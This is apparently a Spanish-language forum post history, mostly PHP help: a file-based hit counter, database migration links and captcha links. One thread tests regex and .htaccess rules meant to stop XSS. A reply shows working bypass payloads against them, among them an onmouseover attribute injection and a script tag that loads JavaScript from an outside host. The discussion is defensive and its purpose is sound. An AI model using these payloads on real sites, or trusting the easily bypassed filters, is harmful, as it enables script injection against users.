Mensajes

[Repito, propongo estudiar la función anterior por si hubiera alguna falla. Y para las/los osadas/dos publicar alguna función que pretenda superar aquella. O la que publique en un principio]

Repito, propongo estudiar la función anterior por si hubiera alguna falla. Y para las/los osadas/dos publicar alguna función que pretenda superar aquella. O la que publique en un principio

Totalmente de acuerdo...

[[How To] Mover una base de datos]

Para exportar has como dice RedMX.

[How To] Mover una base de datos
http://foro.elhacker.net/index.php/topic,172686.0.html

Suerte, 

Mi modesta opinión,

Para dominar cualquier lenguaje de programación, nosotros nunca nacemos sabiendo, por lo que debemos consultar, manuales, tutoriales, etc.

Estos nunca van a ser perfecto, pero por ejemplo, si eres nuevo, tienes que buscar alguno, o, algún tipo de información básica sobre PHP, una vez que ya domines las cosas básicas, te vas orientando tu mismo, de la manera que vayas resolviendo tus dudas y te vayas aclarando en la materia.

Es como todo, debes hacer ejercisios para que le puedas cojer la "vuelta", puedes tu mismo marcarte un reto, de crear una aplicacion web, no hablo de blogs, foros, o cualquier aplicacion de esta, que ya no se pudieran crear uno solo, sino, pequenos scipts, que tu creas que puedas lograr, o algun tipo de ejercisio, que te pudiera ayudar a aumentar tus conocimientos.

Si tienes una duda, preguntando en foros, consultando la web de php.net, etc, vas a lograr dominar este lenguaje.

Suerte, 

[Captcha Gratuito y externo]

Bueno aquí varios links.

Captcha Gratuito y externo
http://foro.elhacker.net/index.php/topic,172975.0.html

ReCaptcha
http://recaptcha.net/

Todos estos son adaptables

Suerte, 

[PHP]

Evidentemente es ASP, pero en PHP, no te va a llevar mas de 10 lineas de código  .

Aquí una ayuda, crea un archivo de texto, y ponle contador.txt, dale permisos de escritura.

Y nuestro archivo donde quieres capturar los clicks

Código (php) [Seleccionar] Expandir


<?php
$filename = "contador.txt"; // Planteamos el nombre del archivo
$fd = fopen ($filename, "r"); // Lo abrimos en modo lectura
$contents = fread ($fd, filesize($filename)); // Leemos
fclose ($fd); // Cerramos
$contents=$contents+1; // Incrementamos el valor por uno
echo $contents; // los mostramos
$fp = fopen ($filename, "w"); // Ahora en modo escritura
fwrite ($fp,$contents); // Escribimos el nuevo valor
fclose ($fp); // Cerramos
?>

Esta funcion es facil, lo que hace es lee el contador del archivo, si el numero es X se le suma uno....

En fin, un simple contador en PHP.

P.D- El Tema va en el subforo de PHP

[no]

born2kill, cambia tu forma de pensar a no tengo que cometer esos fallos...

Haber, estamos analizando, como parar ataques XSS, o prevenirnos de ellos, esta claro que no se deben cometer esos fallos, pero estar prevenidos no viene mal.

Mi forma de pensar?... 

born2kill:

Código [Seleccionar] Expandir

(\"|%22).*(\>|%3E|<|%3C).*
supongo que es para prevenir attribute splitting, como en:

Código (php) [Seleccionar] Expandir


<?php
echo "<a href=\"{$_GET['entrada']}\">Link</a>";
?>

se puede saltar simplemente no cerrando el atributo
?a=" onmouseover="alert(/xss/.source)"

Código [Seleccionar] Expandir

(\<|%3C).*script.*(\>|%3E)
se salta, igual no cerrando <script.. asi:

Código [Seleccionar] Expandir

<script src=//sirdarckcat.net/cache_poisoning.js x

Código [Seleccionar] Expandir

(javascript:).*(\;).*
no pones el ; al final..

Código (javascript) [Seleccionar] Expandir

javascript:alert("pwned")

Código [Seleccionar] Expandir

(,|;|<|>|'|`)
la coma la puedes no usar llamando funciones desde funcion.apply, los ; puedes no usarlos, los "<" y ">" si los quitas, entonces para que son las primeras 2 reglas? XD, y las comillas, para ataques de XSS no son necesarias, puedes usar /texto/.source
Saludos!!

Mhh.... Me dejaste pensando, bueno evidentemente solamente podriamos para ataques básico, tengo que encontrar alguna forma de mejorarlo.



La lista que publicaste esta bien interesante.

[.htaccess]

jajja, esta muy bien el codigo....no te parece mejor un .htaccess  .... Lo que se te va a hacer un mundo cargando la web 

Si alguien logra vulneral esto 

.htaccess

Código [Seleccionar] Expandir

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (javascript:).*(\;).* [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING}
RewriteRule ^(.*)$ index.php [NC]
RewriteRule (,|;|<|>|'|`) /index.php [NC]

Ps, yo no veo nada, me tira error......no obstante no se porque te tira ese error a ti.

Dejame ver...Instalaste un una instalacion limpia de smf no?, le instalaste el mod?.

  . De veras que no lo entiendes, para instalar ese que te di, necesitas una instalacion de un foro SMF 1.1.3 , ya correctamente instalado, una vez que lo tengas instalado le instalas el MOD que te puse (El link) y te debe funcionar.

Saludos